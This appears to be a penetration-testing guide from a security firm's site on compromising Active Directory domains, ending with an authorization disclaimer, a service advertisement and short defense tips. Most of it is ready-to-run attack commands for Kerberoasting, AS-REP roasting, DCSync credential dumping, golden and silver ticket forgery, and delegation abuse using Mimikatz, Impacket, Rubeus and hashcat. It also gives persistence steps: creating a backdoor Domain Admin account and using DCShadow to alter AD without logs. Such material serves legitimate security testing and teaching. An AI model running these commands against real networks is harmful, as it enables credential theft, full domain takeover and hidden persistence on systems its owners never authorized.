Domain penetration focuses on compromising Active Directory environments, which are the backbone of enterprise Windows networks. This guide covers advanced techniques for enumerating, attacking, and maintaining persistence in AD domains.
Active Directory Overview
Active Directory is Microsoft's directory service for Windows domain networks. It stores information about objects on the network and makes this information available to users and administrators. Compromising AD often means gaining control of the entire enterprise network.
AD Enumeration
# Domain information
nltest /dclist:domain.local
Get-ADDomain
Get-ADForest
# User enumeration
net user /domain
Get-ADUser -Filter * -Properties *
# Group enumeration
net group /domain
net group "Domain Admins" /domain
Get-ADGroup -Filter * -Properties *
# Computer enumeration
Get-ADComputer -Filter * -Properties *
# Bloodhound collection
bloodhound-python -d domain.local -u user -p password -ns 10.0.0.1 -c all
SharpHound.exe -c all
Kerberoasting
# Request service tickets for accounts with SPNs
GetUserSPNs.py -request -dc-ip 10.0.0.1 domain.local/user:password
# PowerShell
Invoke-Kerberoast -OutputFormat Hashcat | fl
# Rubeus
Rubeus.exe kerberoast /outfile:hashes.txt
# Crack the hash
hashcat -m 13100 hashes.txt wordlist.txt
AS-REP Roasting
# Find users with "Do not require Kerberos preauthentication"
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
# Request AS-REP hashes
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt
# Rubeus
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
# Crack with hashcat
hashcat -m 18200 hashes.txt wordlist.txt
DCSync Attack
# Requires Replicating Directory Changes permissions
# Mimikatz
lsadump::dcsync /user:domain\krbtgt
lsadump::dcsync /user:domain\Administrator
# Impacket
secretsdump.py domain/admin:[email protected] -just-dc
secretsdump.py domain/[email protected] -hashes :ntlmhash -just-dc-user krbtgt
Golden Ticket Attack
# Get domain SID and krbtgt hash via DCSync
# Create golden ticket with Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /id:500
# Inject ticket
kerberos::ptt ticket.kirbi
# Verify access
dir \\dc.domain.local\c$
# Impacket
ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-... -domain domain.local Administrator
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass domain.local/[email protected]
Silver Ticket Attack
# Create ticket for specific service
# Need service account NTLM hash
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:service_hash /id:500
# Inject and use
kerberos::ptt ticket.kirbi
dir \\server.domain.local\share
Bloodhound Analysis
# Collect data
bloodhound-python -d domain.local -u user -p pass -ns 10.0.0.1 -c all
# Import to Bloodhound
# Start Neo4j database
neo4j console
# Run Bloodhound GUI
# Import JSON files
# Useful queries:
# - Find all Domain Admins
# - Shortest paths to Domain Admins
# - Find computers where Domain Users can RDP
# - Find AS-REP Roastable users
# - Find Kerberoastable users
Constrained Delegation
# Find accounts with constrained delegation
Get-ADUser -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
# Exploit with Rubeus
Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt
# Access target
dir \\target.domain.local\c$
Persistence
# Golden Ticket (long-term persistence)
# Create ticket with 10-year validity
# Create domain admin account
net user backdoor P@ssw0rd /add /domain
net group "Domain Admins" backdoor /add /domain
# AdminSDHolder
# Add user to AdminSDHolder ACL for persistent admin rights
# DCShadow (modify AD without logs)
# Requires DA privileges
lsadump::dcshadow /object:target /attribute:primaryGroupID /value:512
Authorization Required
Domain penetration testing must only be performed with explicit written authorization. Unauthorized access to Active Directory is illegal and can cause severe disruption to business operations.
HackHub Professional Services
Expert Active Directory Security Assessment
The HackHub team specializes in comprehensive Active Directory security assessments with over 10 years of experience. We identify misconfigurations, weak permissions, and attack paths that could lead to domain compromise.
Our AD Services:
- Active Directory Security Review
- Kerberos Attack Simulation
- Bloodhound-based Path Analysis
- AD Hardening Consultation
Contact [email protected] for professional AD security services.
Defense Recommendations
- Least Privilege: Limit Domain Admin usage
- Strong Passwords: Long, complex passwords for service accounts
- Disable NTLM: Use Kerberos only where possible
- Protected Users Group: Add privileged accounts
- Monitor Kerberos: Detect unusual ticket requests
- Regular Audits: Review permissions and delegations
- Credential Guard: Enable on Windows 10/Server 2016+
Conclusion
Active Directory penetration is a critical component of enterprise security testing. Understanding these attack techniques helps organizations identify and remediate vulnerabilities before attackers exploit them. Regular AD security assessments and proper configuration are essential for protecting modern Windows networks.